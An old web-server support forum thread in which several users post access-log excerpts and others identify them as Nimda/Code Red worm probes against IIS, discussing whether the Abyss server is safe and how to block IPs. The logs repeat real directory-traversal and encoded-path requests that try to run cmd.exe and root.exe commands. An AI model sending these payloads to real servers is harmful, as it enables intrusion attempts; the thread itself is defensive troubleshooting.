View previous topic :: View next topic |
Author |
Message |
DLashley -
Joined: 18 Dec 2002 Posts: 207 Location: New York, NY
|
Posted: Tue Dec 31, 2002 5:25 pm Post subject: Am I being hacked? |
|
|
All of a sudden, the ERRORS on my server stats screen shot up, and so did the bandwidth. I checked my cgi and access logs. There wasn't anything in the cgi log, but this was in the access log.
What does this mean? Is someone trying to hack me?
Code: |
69.3.21.188 - - [31/Dec/2002:11:18:40 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427 "" ""
69.3.21.188 - - [31/Dec/2002:11:18:49 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427 "" ""
69.3.21.188 - - [31/Dec/2002:11:18:58 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427 "" ""
69.3.21.188 - - [31/Dec/2002:11:19:07 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427 "" ""
69.3.21.188 - - [31/Dec/2002:11:19:15 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.21.188 - - [31/Dec/2002:11:19:24 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.21.188 - - [31/Dec/2002:11:19:33 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.21.188 - - [31/Dec/2002:11:19:42 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.21.188 - - [31/Dec/2002:11:19:50 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.21.188 - - [31/Dec/2002:11:20:08 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.21.188 - - [31/Dec/2002:11:20:17 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.21.188 - - [31/Dec/2002:11:20:44 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.21.188 - - [31/Dec/2002:11:20:53 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
|
_________________ DLashley |
|
Back to top |
|
|
Jack Guest
|
Posted: Tue Dec 31, 2002 5:40 pm Post subject: Nimda... |
|
|
Hi,
I'm not sure (never am) but a quick search on Google (I'm sure you've heard of that) returns something on this...
The log entries you are experiencing are typical of Nimda checking for a vulnerable webserver. The exploit is possible (correct me if I'm wrong) on some old IIS servers, it does not effect Abyss.
Ofcourse it might not be Nimda, but rather just some hacker tool trying the exploit, not sure though, I'm not a security pro...
Cheers,
Jack |
|
Back to top |
|
|
DLashley -
Joined: 18 Dec 2002 Posts: 207 Location: New York, NY
|
Posted: Tue Dec 31, 2002 7:10 pm Post subject: Re: Nimda... |
|
|
Jack wrote: | Hi,
I'm not sure (never am) but a quick search on Google (I'm sure you've heard of that) returns something on this...
The log entries you are experiencing are typical of Nimda checking for a vulnerable webserver. The exploit is possible (correct me if I'm wrong) on some old IIS servers, it does not effect Abyss.
Ofcourse it might not be Nimda, but rather just some hacker tool trying the exploit, not sure though, I'm not a security pro...
Cheers,
Jack |
Hi Jack,
Thanks for responding. This happened the other night too. I think this person bookmarked my site to try again, because the attempts were from the same range of IP's.
I'm new to reading access logs, but this looked suspicious. Looked like someone was trying to find something on my PC. Also, looks like they didn't have any luck. :P _________________ DLashley |
|
Back to top |
|
|
Ryan Guest
|
Posted: Tue Dec 31, 2002 9:25 pm Post subject: |
|
|
It's Nimda/Code Red trying to gain root/cmd access. Fortunately, abyss sends back a 404 (not found) error when this occurs. I haven't found a way to prevent it other than blocking the ip. But then again, there's alot of machines out there doing this, so a few IPs won't do much. |
|
Back to top |
|
|
DLashley -
Joined: 18 Dec 2002 Posts: 207 Location: New York, NY
|
Posted: Tue Dec 31, 2002 11:41 pm Post subject: |
|
|
Ryan wrote: | It's Nimda/Code Red trying to gain root/cmd access. Fortunately, abyss sends back a 404 (not found) error when this occurs. I haven't found a way to prevent it other than blocking the ip. But then again, there's alot of machines out there doing this, so a few IPs won't do much. |
Thank you for responding, Ryan. :-)
So basically, I'm safe from this thing???
Here's more attempts:
Code: |
69.3.197.78 - - [31/Dec/2002:17:22:23 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:23 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:23 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:23 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:23 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:24 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:24 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:24 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:24 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:24 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:24 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:26 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:29 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
69.3.197.78 - - [31/Dec/2002:17:22:30 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429 "" ""
|
_________________ DLashley |
|
Back to top |
|
|
aprelium -
Joined: 22 Mar 2002 Posts: 6800
|
Posted: Wed Jan 01, 2003 4:24 pm Post subject: |
|
|
DLashley wrote: | So basically, I'm safe from this thing??? |
Yes, you're safe. Abyss Web Server always denies these requests. _________________ Support Team
Aprelium - http://www.aprelium.com |
|
Back to top |
|
|
Guest
|
Posted: Wed Jan 01, 2003 5:19 pm Post subject: |
|
|
Thanks for the reassurance. Safety is my main concern. |
|
Back to top |
|
|
Guest
|
Posted: Wed Jan 01, 2003 5:21 pm Post subject: |
|
|
Ryan wrote: | It's Nimda/Code Red trying to gain root/cmd access. Fortunately, abyss sends back a 404 (not found) error when this occurs. I haven't found a way to prevent it other than blocking the ip. But then again, there's alot of machines out there doing this, so a few IPs won't do much. |
Even though the requests are being denied, this jerk is eating up my bandwidth with this nonsense.
How do you block the IP# in Abyss Web Server? Do you use .htaccess? |
|
Back to top |
|
|
Guest
|
Posted: Wed Jan 01, 2003 7:10 pm Post subject: |
|
|
you cant block his ip yeat till the next release of abyss... i am looking fwd to thsi feature also |
|
Back to top |
|
|
NASCHPITZ Guest
|
Posted: Mon Jan 20, 2003 4:20 am Post subject: The same is happening with me. |
|
|
Take a look at my .log file:
200.149.180.161 - - [19/Jan/2003:17:19:05 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
200.149.180.161 - - [19/Jan/2003:17:19:12 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
200.149.180.161 - - [19/Jan/2003:17:19:15 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
200.149.180.161 - - [19/Jan/2003:17:19:25 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
200.149.180.161 - - [19/Jan/2003:17:19:31 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
200.149.180.161 - - [19/Jan/2003:17:19:35 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
200.149.180.161 - - [19/Jan/2003:17:19:38 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
200.149.180.161 - - [19/Jan/2003:17:19:42 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
200.149.180.161 - - [19/Jan/2003:17:19:46 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
200.149.180.161 - - [19/Jan/2003:17:19:53 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
200.149.180.161 - - [19/Jan/2003:17:19:56 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
200.149.180.161 - - [19/Jan/2003:17:20:00 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
200.149.180.161 - - [19/Jan/2003:17:20:11 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
200.149.180.161 - - [19/Jan/2003:17:20:18 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
This is just a small part of the .log file, there are MANY other attacks.
I don't use any kind of firewall, because they block the Server. Am I under any risk? Thank u in advance.
Brazil - Rio de Janeiro |
|
Back to top |
|
|
thedane -
Joined: 18 Jan 2003 Posts: 10 Location: Holland
|
Posted: Mon Jan 20, 2003 9:56 am Post subject: Re: The same is happening with me. |
|
|
NASCHPITZ wrote: | Take a look at my .log file:
[..]
I don't use any kind of firewall, because they block the Server. Am I under any risk? Thank u in advance.
Brazil - Rio de Janeiro |
Most firewalls (even the built-in one in Windows XP) have a function to allow or disallow the requests from a single or multi IP addresses.
I'm using ZoneAlarm, which I have setup to allow only http requests to port 8080, the port Abyss web server is listening to. Any other requests, such as stated above, will be automagically blocked _________________ "hmm, that's odd" |
|
Back to top |
|
|
Vitalichka -
Joined: 25 Jan 2003 Posts: 7
|
Posted: Sun Jan 26, 2003 3:13 am Post subject: |
|
|
I have a similar problem and aprelium sent me over to this post to read.
My question now is... The ip of the person or machine trying to hack in, is comming from AT&T and they are my provider. I traced the IPs. They do not allow one to run servers. I was wondering, sisnce the IP traces back to the ATT broadband, would that mean it's just a user of the service or is it ATT checking up on me through their check up service systems?
Thank you. Anything will help.
:?: |
|
Back to top |
|
|
feamsr00 -
Joined: 04 Jun 2002 Posts: 138 Location: Phila PA
|
Posted: Sun Jan 26, 2003 9:26 am Post subject: |
|
|
Is the ip from a pool or does it look internal? (if not sure, post the dns name of the ip) |
|
Back to top |
|
|
beecheyj_14 -
Joined: 11 Aug 2003 Posts: 1
|
Posted: Fri Aug 15, 2003 10:56 pm Post subject: i'm getting the same thing |
|
|
theres a bunch of those in my access log 2 and most of them are from ppl within my isp. is this a good thing? |
|
Back to top |
|
|
|